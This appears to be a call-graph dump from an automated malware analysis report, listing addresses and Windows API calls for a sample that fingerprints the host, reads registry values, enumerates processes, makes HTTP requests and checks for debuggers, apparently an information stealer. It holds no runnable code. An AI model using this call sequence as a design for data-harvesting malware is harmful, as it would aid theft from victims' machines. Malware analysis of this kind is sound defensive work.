22203 40391d 22202->22203 22204 4047e8 3 API calls 22203->22204 22205 403937 22204->22205 22206 4047e8 3 API calls 22205->22206 22207 40394e 22206->22207 22208 4047e8 3 API calls 22207->22208 22209 403965 22208->22209 22210 4047e8 3 API calls 22209->22210 22211 40397c 22210->22211 22212 4047e8 3 API calls 22211->22212 22213 403993 22212->22213 22214 4047e8 3 API calls 22213->22214 22215 4039aa 22214->22215 22216 4047e8 3 API calls 22215->22216 22217 4039c1 22216->22217 22218 4047e8 3 API calls 22217->22218 22219 4039d8 22218->22219 22220 4047e8 3 API calls 22219->22220 22221 4039f2 22220->22221 22222 4047e8 3 API calls 22221->22222 22223 403a09 22222->22223 22224 4047e8 3 API calls 22223->22224 22225 403a20 22224->22225 22226 4047e8 3 API calls 22225->22226 22227 403a37 22226->22227 22228 4047e8 3 API calls 22227->22228 22229 403a4e 22228->22229 22230 4047e8 3 API calls 22229->22230 22231 403a65 22230->22231 22232 4047e8 3 API calls 22231->22232 22233 403a7c 22232->22233 22234 4047e8 3 API calls 22233->22234 22235 403a90 22234->22235 22236 4047e8 3 API calls 22235->22236 22237 403aaa 22236->22237 22238 4047e8 3 API calls 22237->22238 22239 403ac1 22238->22239 22240 4047e8 3 API calls 22239->22240 22241 403ad7 22240->22241 22242 4047e8 3 API calls 22241->22242 22243 403aee 22242->22243 22244 4047e8 3 API calls 22243->22244 22245 403b05 22244->22245 22246 4047e8 3 API calls 22245->22246 22247 403b1c 22246->22247 22248 4047e8 3 API calls 22247->22248 22249 403b33 22248->22249 22250 4047e8 3 API calls 22249->22250 22251 403b4a 22250->22251 22252 4047e8 3 API calls 22251->22252 22253 403b61 22252->22253 22254 4047e8 3 API calls 22253->22254 22255 403b75 22254->22255 22256 4047e8 3 API calls 22255->22256 22257 403b8c 22256->22257 22258 4047e8 3 API calls 22257->22258 22259 403ba3 22258->22259 22260 4047e8 3 API calls 22259->22260 22261 403bba 22260->22261 22262 4047e8 3 API calls 22261->22262 22263 403bd1 22262->22263 22264 4047e8 3 API calls 22263->22264 22265 403be8 22264->22265 22266 4047e8 3 API calls 22265->22266 22267 403bff 22266->22267 22268 4047e8 3 API calls 22267->22268 22269 403c19 22268->22269 22270 4047e8 3 API calls 22269->22270 22271 403c30 22270->22271 22272 4047e8 3 API calls 22271->22272 22273 403c47 22272->22273 22274 4047e8 3 API calls 22273->22274 22275 403c5e 22274->22275 22276 4047e8 3 API calls 22275->22276 22277 403c75 22276->22277 22278 4047e8 3 API calls 22277->22278 22279 403c8c 22278->22279 22280 4047e8 3 API calls 22279->22280 22281 403ca3 22280->22281 22282 4047e8 3 API calls 22281->22282 22283 403cb7 22282->22283 22284 4047e8 3 API calls 22283->22284 22285 403cd1 22284->22285 22286 4047e8 3 API calls 22285->22286 22287 403ce8 22286->22287 22288 4047e8 3 API calls 22287->22288 22289 403cff 22288->22289 22290 4047e8 3 API calls 22289->22290 22291 403d16 22290->22291 22292 4047e8 3 API calls 22291->22292 22293 403d2c 22292->22293 22294 4047e8 3 API calls 22293->22294 22295 403d43 22294->22295 22296 4047e8 3 API calls 22295->22296 22297 403d57 22296->22297 22298 4047e8 3 API calls 22297->22298 22299 403d6e 22298->22299 22300 4047e8 3 API calls 22299->22300 22301 403d85 22300->22301 22302 4047e8 3 API calls 22301->22302 22303 403d9c 22302->22303 22304 4047e8 3 API calls 22303->22304 22305 403db3 22304->22305 22306 4047e8 3 API calls 22305->22306 22307 403dca 22306->22307 22308 4047e8 3 API calls 22307->22308 22309 403de1 22308->22309 22310 4047e8 3 API calls 22309->22310 22311 403df8 22310->22311 22312 4047e8 3 API calls 22311->22312 22313 403e0f 22312->22313 22314 4047e8 3 API calls 22313->22314 22315 403e26 22314->22315 22316 4047e8 3 API calls 22315->22316 22317 403e40 22316->22317 22318 4047e8 3 API calls 22317->22318 22319 403e57 22318->22319 22320 4047e8 3 API calls 22319->22320 22321 403e6e 22320->22321 22322 4047e8 3 API calls 22321->22322 22323 403e84 22322->22323 22324 4047e8 3 API calls 22323->22324 22325 403e9b 22324->22325 22326 4047e8 3 API calls 22325->22326 22327 403eb2 22326->22327 22328 4047e8 3 API calls 22327->22328 22329 403ec9 22328->22329 22330 4047e8 3 API calls 22329->22330 22331 403ee0 22330->22331 22332 4047e8 3 API calls 22331->22332 22333 403efa 22332->22333 22334 4047e8 3 API calls 22333->22334 22335 403f10 22334->22335 22336 4047e8 3 API calls 22335->22336 22337 403f27 22336->22337 22338 4047e8 3 API calls 22337->22338 22339 403f3e 22338->22339 22340 4047e8 3 API calls 22339->22340 22341 403f55 22340->22341 22342 4047e8 3 API calls 22341->22342 22343 403f6c 22342->22343 22344 4047e8 3 API calls 22343->22344 22345 403f80 22344->22345 22346 4047e8 3 API calls 22345->22346 22347 403f97 22346->22347 22348 4047e8 3 API calls 22347->22348 22349 403fb1 22348->22349 22350 4047e8 3 API calls 22349->22350 22351 403fc7 22350->22351 22352 4047e8 3 API calls 22351->22352 22353 403fde 22352->22353 22354 4047e8 3 API calls 22353->22354 22355 403ff2 22354->22355 22356 4047e8 3 API calls 22355->22356 22357 404009 22356->22357 22358 4047e8 3 API calls 22357->22358 22359 404020 22358->22359 22360 4047e8 3 API calls 22359->22360 22361 404037 22360->22361 22362 4047e8 3 API calls 22361->22362 22363 40404e 22362->22363 22364 4047e8 3 API calls 22363->22364 22365 404067 22364->22365 22366 4047e8 3 API calls 22365->22366 22367 40407e 22366->22367 22368 4047e8 3 API calls 22367->22368 22369 404094 22368->22369 22370 4047e8 3 API calls 22369->22370 22371 4040a8 22370->22371 22372 4047e8 3 API calls 22371->22372 22373 4040bf 22372->22373 22374 4047e8 3 API calls 22373->22374 22375 4040d6 22374->22375 22376 4047e8 3 API calls 22375->22376 22377 4040ed 22376->22377 22378 4047e8 3 API calls 22377->22378 22379 404104 22378->22379 22380 4047e8 3 API calls 22379->22380 22381 40411e 22380->22381 22382 4047e8 3 API calls 22381->22382 22383 404135 22382->22383 22384 4047e8 3 API calls 22383->22384 22385 40414c 22384->22385 22386 4047e8 3 API calls 22385->22386 22387 404163 22386->22387 22388 4047e8 3 API calls 22387->22388 22389 404179 22388->22389 22390 4047e8 3 API calls 22389->22390 22391 40418d 22390->22391 22392 4047e8 3 API calls 22391->22392 22393 4041a1 22392->22393 22394 4047e8 3 API calls 22393->22394 22395 4041b8 22394->22395 22396 4047e8 3 API calls 22395->22396 22397 4041d2 22396->22397 22398 4047e8 3 API calls 22397->22398 22399 4041e8 22398->22399 22400 4047e8 3 API calls 22399->22400 22401 4041ff 22400->22401 22402 4047e8 3 API calls 22401->22402 22403 404216 22402->22403 22404 4047e8 3 API calls 22403->22404 22405 40422d 22404->22405 22406 4047e8 3 API calls 22405->22406 22407 404244 22406->22407 22408 4047e8 3 API calls 22407->22408 22409 404258 22408->22409 22410 4047e8 3 API calls 22409->22410 22411 40426e 22410->22411 22412 4047e8 3 API calls 22411->22412 22413 404288 22412->22413 22414 4047e8 3 API calls 22413->22414 22415 40429f 22414->22415 22416 4047e8 3 API calls 22415->22416 22417 4042b6 22416->22417 22418 4047e8 3 API calls 22417->22418 22419 4042cc 22418->22419 22420 4047e8 3 API calls 22419->22420 22421 4042e3 22420->22421 22422 4047e8 3 API calls 22421->22422 22423 4042fa 22422->22423 22424 4047e8 3 API calls 22423->22424 22425 404311 22424->22425 22426 4047e8 3 API calls 22425->22426 22427 404325 22426->22427 22428 4047e8 3 API calls 22427->22428 22429 40433c 22428->22429 22430 4047e8 3 API calls 22429->22430 22431 404353 22430->22431 22432 4047e8 3 API calls 22431->22432 22433 40436a 22432->22433 22434 4047e8 3 API calls 22433->22434 22435 404381 22434->22435 22436 4047e8 3 API calls 22435->22436 22437 404395 22436->22437 22438 4047e8 3 API calls 22437->22438 22439 4043ac 22438->22439 22440 4047e8 3 API calls 22439->22440 22441 4043c3 22440->22441 22442 4047e8 3 API calls 22441->22442 22443 4043da 22442->22443 22444 4047e8 3 API calls 22443->22444 22445 4043f1 22444->22445 22446 4047e8 3 API calls 22445->22446 22447 404408 22446->22447 22448 4047e8 3 API calls 22447->22448 22449 40441c 22448->22449 22450 4047e8 3 API calls 22449->22450 22451 404433 22450->22451 22452 4047e8 3 API calls 22451->22452 22453 40444a 22452->22453 22454 4047e8 3 API calls 22453->22454 22455 40445e 22454->22455 22456 4047e8 3 API calls 22455->22456 22457 404472 22456->22457 22458 4047e8 3 API calls 22457->22458 22459 404486 22458->22459 22460 4047e8 3 API calls 22459->22460 22461 4044a0 22460->22461 22462 4047e8 3 API calls 22461->22462 22463 4044b7 22462->22463 22464 4047e8 3 API calls 22463->22464 22465 4044cd 22464->22465 22466 4047e8 3 API calls 22465->22466 22467 4044e4 22466->22467 22468 4047e8 3 API calls 22467->22468 22469 4044fa 22468->22469 22470 4047e8 3 API calls 22469->22470 22471 404511 22470->22471 22472 4047e8 3 API calls 22471->22472 22473 404528 22472->22473 22474 4047e8 3 API calls 22473->22474 22475 40453e 22474->22475 22476 4047e8 3 API calls 22475->22476 22477 404558 22476->22477 22478 4047e8 3 API calls 22477->22478 22479 40456f 22478->22479 22480 4047e8 3 API calls 22479->22480 22481 404586 22480->22481 22482 4047e8 3 API calls 22481->22482 22483 40459d 22482->22483 22484 4047e8 3 API calls 22483->22484 22485 4045b4 22484->22485 22486 4047e8 3 API calls 22485->22486 22487 4045cb 22486->22487 22488 4047e8 3 API calls 22487->22488 22489 4045e2 22488->22489 22490 4047e8 3 API calls 22489->22490 22491 4045f9 22490->22491 22492 4047e8 3 API calls 22491->22492 22493 404612 22492->22493 22494 4047e8 3 API calls 22493->22494 22495 404629 22494->22495 22496 4047e8 3 API calls 22495->22496 22497 404642 22496->22497 22498 4047e8 3 API calls 22497->22498 22499 404656 22498->22499 22500 4047e8 3 API calls 22499->22500 22501 40466d 22500->22501 22502 4047e8 3 API calls 22501->22502 22503 404684 22502->22503 22504 4047e8 3 API calls 22503->22504 22505 40469b 22504->22505 22506 4047e8 3 API calls 22505->22506 22507 4046b2 22506->22507 22508 4047e8 3 API calls 22507->22508 22509 4046cc 22508->22509 22510 4047e8 3 API calls 22509->22510 22511 4046e3 22510->22511 22512 4047e8 3 API calls 22511->22512 22513 4046f9 22512->22513 22514 4047e8 3 API calls 22513->22514 22515 404710 22514->22515 22516 4047e8 3 API calls 22515->22516 22517 404727 22516->22517 22518 4047e8 3 API calls 22517->22518 22519 40473d 22518->22519 22520 4047e8 3 API calls 22519->22520 22521 404754 22520->22521 22522 4047e8 3 API calls 22521->22522 22523 404768 22522->22523 22524 4047e8 3 API calls 22523->22524 22525 404781 22524->22525 22526 4047e8 3 API calls 22525->22526 22527 404797 22526->22527 22528 4047e8 3 API calls 22527->22528 22529 4047ae 22528->22529 22530 4047e8 3 API calls 22529->22530 22531 4047c5 22530->22531 22532 4047e8 3 API calls 22531->22532 22533 4047dc 22532->22533 22533->21857 22711 42f229 22534->22711 22536 41258e CreateToolhelp32Snapshot Process32First 22537 4125c2 Process32Next 22536->22537 22538 4125ef 22536->22538 22537->22538 22539 4125d4 22537->22539 22712 42f285 22538->22712 22539->22537 22543 411c67 22542->22543 22544 41d12a __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22543->22544 22545 411cc8 22544->22545 22545->21859 22547 4169ec 22546->22547 22548 416d1a 22547->22548 22549 4168c6 13 API calls 22547->22549 22550 41683e 13 API calls 22547->22550 22548->21863 22549->22547 22550->22547 22552 4109db GetVolumeInformationA 22551->22552 22555 410a4d 22552->22555 22554 410a7d 22556 41d12a __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22554->22556 22555->22554 22715 411684 GetCurrentHwProfileA 22555->22715 22558 410b2e 22556->22558 22558->21865 22559 410ac7 22722 4123d5 malloc strncpy 22559->22722 22561 410aea 22561->22554 22563 404b59 22562->22563 22724 404ab6 22563->22724 22565 404b65 22566 411c4a 5 API calls 22565->22566 22567 405176 22565->22567 22571 404c15 22566->22571 22568 41d12a __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22567->22568 22569 405235 22568->22569 22572 4139c2 22569->22572 22570 40515c InternetReadFile 22570->22567 22570->22571 22571->22567 22571->22570 22573 4139dd strtok_s 22572->22573 22575 413b48 22573->22575 22577 413a04 22573->22577 22575->21869 22576 413b2a strtok_s 22576->22575 22576->22577 22577->22576 22579 405f64 22578->22579 22580 404ab6 4 API calls 22579->22580 22581 405f70 22580->22581 22582 411c4a 5 API calls 22581->22582 22583 4066ec 22581->22583 22586 406020 _memmove 22582->22586 22584 41d12a __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22583->22584 22585 4067eb 22584->22585 22588 41343f strtok_s 22585->22588 22586->22583 22587 4066d2 InternetReadFile 22586->22587 22587->22583 22587->22586 22589 4134cc 22588->22589 22591 41346e 22588->22591 22589->21873 22590 4134b6 strtok_s 22590->22589 22590->22591 22591->22590 22595 413286 22592->22595 22593 413385 22593->21877 22594 413367 strtok_s 22594->22595 22595->22593 22595->22594 22597 413434 22596->22597 22598 4133bc 22596->22598 22597->21881 22599 41341a strtok_s 22598->22599 22599->22597 22599->22598 22601 413b9f 22600->22601 22729 410cc0 22601->22729 22603 413c44 22734 4115d4 22603->22734 22605 413ca5 22606 411684 8 API calls 22605->22606 22607 413d09 22606->22607 22608 4109a2 9 API calls 22607->22608 22609 413d76 22608->22609 22742 41224a 22609->22742 22611 413dea 22748 410b30 22611->22748 22613 413e95 22755 411807 22613->22755 22615 413ef9 22770 411997 22615->22770 22617 413f67 22618 410c85 3 API calls 22617->22618 22619 413fd2 22618->22619 22780 410c53 GetProcessHeap HeapAlloc GetUserNameA 22619->22780 22621 414033 22781 410ddb 22621->22781 22623 414106 22624 410cc0 6 API calls 22623->22624 22625 414170 22624->22625 22787 410d2e 22625->22787 22627 4141d1 22793 410f51 22627->22793 22629 414252 22798 411007 22629->22798 22631 4142b3 22802 410fba GetSystemInfo 22631->22802 22633 414314 22806 411119 22633->22806 22635 414375 22812 411192 22635->22812 22637 4143e2 22816 4114a5 22637->22816 22639 414455 22824 411203 22639->22824 22641 4144d1 22642 411203 10 API calls 22641->22642 22643 414509 22642->22643 22835 416fa7 22643->22835 22645 414586 22645->21883 22647 40525a 22646->22647 22648 404ab6 4 API calls 22647->22648 22649 405266 22648->22649 22650 41d12a __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22649->22650 22651 405480 22650->22651 22651->21885 23059 407eee 22652->23059 22654 40ec9e 23062 40e186 22654->23062 22656 40ecb0 23081 40e6cf 22656->23081 22658 40ee88 22658->21887 22663 40ead3 22663->22654 23093 40c77a 67 API calls 22663->23093 23094 40c95c 68 API calls 22663->23094 23095 40d9aa 63 API calls 22663->23095 22665 40ecbc 22665->22658 23096 40c77a 67 API calls 22665->23096 23097 40c95c 68 API calls 22665->23097 23098 40d9aa 63 API calls 22665->23098 22668 4139ac 22667->22668 22673 413640 22667->22673 22669 41d12a __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22668->22669 22670 4139c0 22669->22670 22670->21901 22671 41397f strtok_s 22671->22668 22671->22673 22672 411dbc IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22672->22673 22673->22671 22673->22672 22675 4153e9 22674->22675 22676 4153a8 22674->22676 22675->21910 22676->22675 23106 415142 64 API calls 2 library calls 22676->23106 22678->21931 22680 4183ab _memset 22679->22680 22681 41d12a __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22680->22681 22682 4185b9 22681->22682 22682->21933 22683->21900 22684->21888 22685->21902 22686->21889 22687->21914 22688->21912 22689->21913 22690->21917 22691->21919 22692->21922 22693->21928 22694->21923 22695->21940 22697 4054bc 22696->22697 22698 404ab6 4 API calls 22697->22698 22700 4054d5 22698->22700 22699 411c4a 5 API calls 22703 4055cc 22699->22703 22700->22699 22707 405d75 22700->22707 22701 41d12a __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22702 405f2d 22701->22702 22709 413198 strtok_s strtok_s 22702->22709 22704 4056d4 HttpOpenRequestA 22703->22704 22703->22707 22705 405718 _memmove 22704->22705 22704->22707 22706 405d20 HttpSendRequestA 22705->22706 22706->22707 22707->22701 22708 405f2f 22707->22708 22709->21944 22710->21946 22711->22536 22713 41d12a __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22712->22713 22714 412601 22713->22714 22714->21908 22714->21909 22716 41173c 22715->22716 22718 4116ad _memset 22715->22718 22717 41d12a __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22716->22717 22719 411755 22717->22719 22723 4123d5 malloc strncpy 22718->22723 22719->22559 22721 4116ea 22721->22716 22722->22561 22723->22721 22725 404ac4 22724->22725 22725->22725 22726 404acb ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI 22725->22726 22727 404b0c InternetCrackUrlA 22726->22727 22728 404b27 22727->22728 22728->22565 22730 410cde RtlAllocateHeap 22729->22730 22731 410cf1 22730->22731 22732 41d12a __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22731->22732 22733 410d2c 22732->22733 22733->22603 22841 423d30 22734->22841 22737 411651 CharToOemA 22740 41d12a __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22737->22740 22738 411630 RegQueryValueExA 22738->22737 22741 411682 22740->22741 22741->22605 22743 412272 22742->22743 22744 412294 22743->22744 22745 412278 K32GetModuleFileNameExA 22743->22745 22746 41d12a __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22744->22746 22745->22744 22747 4122ae 22746->22747 22747->22611 22749 410b4a 22748->22749 22843 410c16 22749->22843 22752 410b63 RegOpenKeyExA 22753 410b83 RegQueryValueExA 22752->22753 22754 410b5c 22752->22754 22753->22754 22754->22613 22851 42f229 22755->22851 22757 411813 CoInitializeEx CoInitializeSecurity CoCreateInstance 22758 41186b 22757->22758 22759 411873 CoSetProxyBlanket 22758->22759 22760 411964 22758->22760 22762 4118a3 22759->22762 22761 42f285 5 API calls 22760->22761 22763 411996 22761->22763 22762->22760 22764 4118d7 VariantInit 22762->22764 22763->22615 22765 4118f6 22764->22765 22852 411757 22765->22852 22767 411901 FileTimeToSystemTime 22768 41191c 22767->22768 22769 411958 VariantClear 22768->22769 22769->22760 22861 42f1bd 22770->22861 22772 4119a3 CoInitializeEx CoInitializeSecurity CoCreateInstance 22773 4119f9 22772->22773 22774 411a01 CoSetProxyBlanket 22773->22774 22775 411a93 22773->22775 22776 411a31 22774->22776 22775->22617 22776->22775 22777 411a59 VariantInit 22776->22777 22778 411a78 22777->22778 22779 411a87 VariantClear 22778->22779 22779->22775 22780->22621 22786 410e02 22781->22786 22782 410eed 22784 41d12a __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22782->22784 22783 410e42 GetLocaleInfoA 22783->22786 22785 410f15 22784->22785 22785->22623 22786->22782 22786->22783 22788 410d4f GetTimeZoneInformation 22787->22788 22790 410d6a 22788->22790 22791 41d12a __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22790->22791 22792 410d93 22791->22792 22792->22627 22794 410f6b RegOpenKeyExA 22793->22794 22796 410f94 RegQueryValueExA 22794->22796 22797 410fac 22794->22797 22796->22797 22797->22629 22799 411048 22798->22799 22800 41d12a __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22799->22800 22801 411117 22800->22801 22801->22631 22803 410ff2 22802->22803 22804 41d12a __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22803->22804 22805 411005 22804->22805 22805->22633 22807 411137 22806->22807 22808 41114d GlobalMemoryStatusEx 22807->22808 22809 41115f 22808->22809 22810 41d12a __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22809->22810 22811 411190 22810->22811 22811->22635 22814 4111b3 22812->22814 22813 41d12a __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22815 411201 22813->22815 22814->22813 22815->22637 22862 4104e7 22816->22862 22818 4114c6 CreateToolhelp32Snapshot Process32First 22819 41154c 22818->22819 22823 4114ee 22818->22823 22821 41d12a __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22819->22821 22820 41153a Process32Next 22820->22819 22820->22823 22822 411561 22821->22822 22822->22639 22823->22820 22825 4104e7 22824->22825 22826 41123b RegOpenKeyExA 22825->22826 22828 41145e 22826->22828 22833 411281 22826->22833 22827 411287 RegEnumKeyExA 22827->22833 22830 41d12a __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22828->22830 22829 4112e3 RegOpenKeyExA 22829->22828 22831 41130a RegQueryValueExA 22829->22831 22832 4114a3 22830->22832 22831->22833 22832->22641 22833->22827 22833->22828 22833->22829 22834 4113b0 RegQueryValueExA 22833->22834 22834->22833 22837 416fb7 22835->22837 22836 417039 CreateThread WaitForSingleObject 22840 417061 22836->22840 23055 416ed6 22836->23055 22837->22836 22864 41cddb 22837->22864 22840->22645 22842 41160c RegOpenKeyExA 22841->22842 22842->22737 22842->22738 22846 410ba9 22843->22846 22845 410b58 22845->22752 22845->22754 22847 410bc3 RegOpenKeyExA 22846->22847 22849 410bec RegQueryValueExA 22847->22849 22850 410c03 22847->22850 22849->22850 22850->22845 22851->22757 22860 42f1bd 22852->22860 22854 411763 CoCreateInstance 22855 41178b SysAllocString 22854->22855 22856 4117e7 22854->22856 22855->22856 22858 41179a 22855->22858 22856->22767 22857 4117e0 SysFreeString 22857->22856 22858->22857 22859 4117be _wtoi64 SysFreeString 22858->22859 22859->22857 22860->22854 22861->22772 22863 4104f2 22862->22863 22863->22818 22867 41cd93 22864->22867 22868 41cda2 22867->22868 22869 417037 22867->22869 22868->22869 22871 41c585 22868->22871 22869->22836 22872 41c5ad 22871->22872 22876 41c5b7 22871->22876 22874 41d12a __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22872->22874 22873 41c5e1 lstrcpyA 22873->22872 22877 41c5fe 22873->22877 22875 41cbbe 22874->22875 22875->22869 22876->22872 22876->22873 22878 41c66e 22877->22878 23006 41b983 9 API calls 22877->23006 22880 41c680 22878->22880 22881 41c68f 22878->22881 23007 41c05a 20 API calls 22880->23007 22883 41c6a4 22881->22883 22884 41c694 22881->22884 22887 41c6b9 22883->22887 22888 41c6a9 22883->22888 23008 41c0d9 18 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 22884->23008 22885 41c68d 22890 41c6c7 22885->22890 22887->22872 22889 41c6c2 22887->22889 23009 41c1fc 8 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 22888->23009 23010 41c2bf 8 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 22889->23010 22890->22872 22893 41c6d1 lstrcpyA lstrcpyA lstrlenA 22890->22893 22894 41c711 lstrcatA 22893->22894 22895 41c729 lstrcpyA 22893->22895 22894->22895 22896 41c792 22895->22896 22934 41af66 22896->22934 22898 41c8e8 22899 41c8fd 22898->22899 22900 41c8ec 22898->22900 22902 41c917 22899->22902 22907 41c926 22899->22907 23011 41c3ff CloseHandle 22900->23011 23012 41c3ff CloseHandle 22902->23012 22904 41c972 22906 41c974 rand 22904->22906 22905 41c95a GetDesktopWindow GetTickCount srand 22905->22904 22906->22906 22908 41c987 22906->22908 22907->22904 22907->22905 22909 41c9bd 22908->22909 22912 41c9ce 22908->22912 23013 41be93 malloc WriteFile _memmove 22909->23013 22911 41c9ca 22911->22912 22913 41ca0f 22912->22913 22914 41c9ff 22912->22914 22918 41ca0d 22912->22918 22916 41ca13 22913->22916 22913->22918 22999 41c440 22914->22999 23014 41c52d malloc WriteFile ReadFile 22916->23014 23015 41c3ff CloseHandle 22918->23015 22920 41ca33 22920->22872 22921 41ca90 22920->22921 22922 41cafd 22920->22922 23016 41bf73 SetFilePointer 22921->23016 22933 41c91e 22922->22933 23018 41b1c8 malloc WriteFile 22922->23018 22925 41caca 22926 41af66 2 API calls 22925->22926 22925->22933 22928 41cae5 22926->22928 22927 41cb46 malloc 23019 427170 22927->23019 22928->22872 23017 41bf73 SetFilePointer 22928->23017 22930 41cb69 malloc 22930->22933 22932 41caf7 22932->22872 22932->22927 22932->22933 22933->22872 23021 41be93 malloc WriteFile _memmove 22934->23021 22936 41af7e 23022 41be93 malloc WriteFile _memmove 22936->23022 22938 41af8e 23023 41be93 malloc WriteFile _memmove 22938->23023 22940 41af9e 23024 41be93 malloc WriteFile _memmove 22940->23024 22942 41afae 23025 41be93 malloc WriteFile _memmove 22942->23025 22944 41afc0 23026 41be93 malloc WriteFile _memmove 22944->23026 22946 41afd2 23027 41be93 malloc WriteFile _memmove 22946->23027 22948 41afe4 23028 41be93 malloc WriteFile _memmove 22948->23028 22950 41aff6 23029 41be93 malloc WriteFile _memmove 22950->23029 22952 41b008 23030 41be93 malloc WriteFile _memmove 22952->23030 22954 41b01a 23031 41be93 malloc WriteFile _memmove 22954->23031 22956 41b02c 23032 41be93 malloc WriteFile _memmove 22956->23032 22958 41b03e 23033 41be93 malloc WriteFile _memmove 22958->23033 22960 41b050 23034 41be93 malloc WriteFile _memmove 22960->23034 22962 41b062 23035 41be93 malloc WriteFile _memmove 22962->23035 22964 41b074 23036 41be93 malloc WriteFile _memmove 22964->23036 22966 41b086 23037 41be93 malloc WriteFile _memmove 22966->23037 22968 41b098 23038 41be93 malloc WriteFile _memmove 22968->23038 22970 41b0aa 23039 41be93 malloc WriteFile _memmove 22970->23039 22972 41b0bc 23040 41be93 malloc WriteFile _memmove 22972->23040 22974 41b0ce 23041 41be93 malloc WriteFile _memmove 22974->23041 22976 41b0e0 23042 41be93 malloc WriteFile _memmove 22976->23042 22978 41b0f2 23043 41be93 malloc WriteFile _memmove 22978->23043 22980 41b104 23044 41be93 malloc WriteFile _memmove 22980->23044 22982 41b116 23045 41be93 malloc WriteFile _memmove 22982->23045 22984 41b128 23046 41be93 malloc WriteFile _memmove 22984->23046 22986 41b13a 23047 41be93 malloc WriteFile _memmove 22986->23047 22988 41b14c 23048 41be93 malloc WriteFile _memmove 22988->23048 22990 41b161 23049 41be93 malloc WriteFile _memmove 22990->23049 22992 41b173 23050 41be93 malloc WriteFile _memmove 22992->23050 22994 41b188 22995 41b19f 22994->22995 23051 41be93 malloc WriteFile _memmove 22994->23051 22997 41b1a4 22995->22997 23052 41be93 malloc WriteFile _memmove 22995->23052 22997->22898 23000 41c44c malloc 22999->23000 23001 41c45e 22999->23001 23000->23001 23053 41961d IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23001->23053 23003 41c4e2 23054 41ac95 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23003->23054 23005 41c4fd 23005->22918 23006->22878 23007->22885 23008->22885 23009->22885 23010->22890 23011->22872 23012->22933 23013->22911 23014->22918 23015->22920 23016->22925 23017->22932 23018->22932 23020 427188 23019->23020 23020->22930 23020->23020 23021->22936 23022->22938 23023->22940 23024->22942 23025->22944 23026->22946 23027->22948 23028->22950 23029->22952 23030->22954 23031->22956 23032->22958 23033->22960 23034->22962 23035->22964 23036->22966 23037->22968 23038->22970 23039->22972 23040->22974 23041->22976 23042->22978 23043->22980 23044->22982 23045->22984 23046->22986 23047->22988 23048->22990 23049->22992 23050->22994 23051->22995 23052->22997 23053->23003 23054->23005 23056 416ee2 __EH_prolog3_catch 23055->23056 23057 405482 11 API calls 23056->23057 23058 416ef3 23056->23058 23057->23056 23099 407eae malloc 23059->23099 23061 407efc 23061->22663 23063 40e1bc _memset 23062->23063 23064 40e1fe RegOpenKeyExA 23063->23064 23065 40e237 RegGetValueA 23064->23065 23066 40e6b8 23064->23066 23067 40e264 23065->23067 23071 40e287 23065->23071 23069 41d12a __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23066->23069 23067->23066 23068 40e2a9 RegOpenKeyExA 23068->23066 23076 40e2c7 23068->23076 23070 40e6cd 23069->23070 23070->22656 23071->23067 23071->23068 23072 40e356 RegGetValueA 23072->23076 23073 40e3a9 RegGetValueA 23073->23076 23075 40e485 RegGetValueA 23075->23076 23076->23067 23076->23072 23076->23073 23076->23075 23077 40e504 RegGetValueA 23076->23077 23079 40e63c 23076->23079 23100 412406 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 23076->23100 23101 40dca0 106 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 23076->23101 23077->23076 23080 416fa7 59 API calls 23079->23080 23080->23067 23082 40e6e8 23081->23082 23102 411dbc 23082->23102 23084 40e6f9 23085 40e775 strtok_s 23084->23085 23086 40ea60 23084->23086 23092 40e796 23085->23092 23086->22665 23087 40ea2d 23088 416fa7 59 API calls 23087->23088 23088->23086 23089 4123d5 malloc strncpy 23091 40e7e9 23089->23091 23090 40ea10 strtok_s 23090->23092 23091->23089 23091->23092 23092->23087 23092->23090 23092->23091 23093->22663 23094->22663 23095->22663 23096->22665 23097->22665 23098->22665 23099->23061 23100->23076 23101->23076 23103 411e03 23102->23103 23104 41d12a __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23103->23104 23105 411e1d 23104->23105 23105->23084 23106->22676 23108 41ccf1 23107->23108 23109 41cce3 23107->23109 23116 41bd34 23108->23116 23127 41bc7f lstrlenA malloc lstrcpyA 23109->23127 23111 41cced 23111->23108 23114 41cd17 malloc 23115 41cd0a 23114->23115 23115->21949 23117 41bd43 23116->23117 23124 41bd9c 23116->23124 23118 41bda3 23117->23118 23119 41bd76 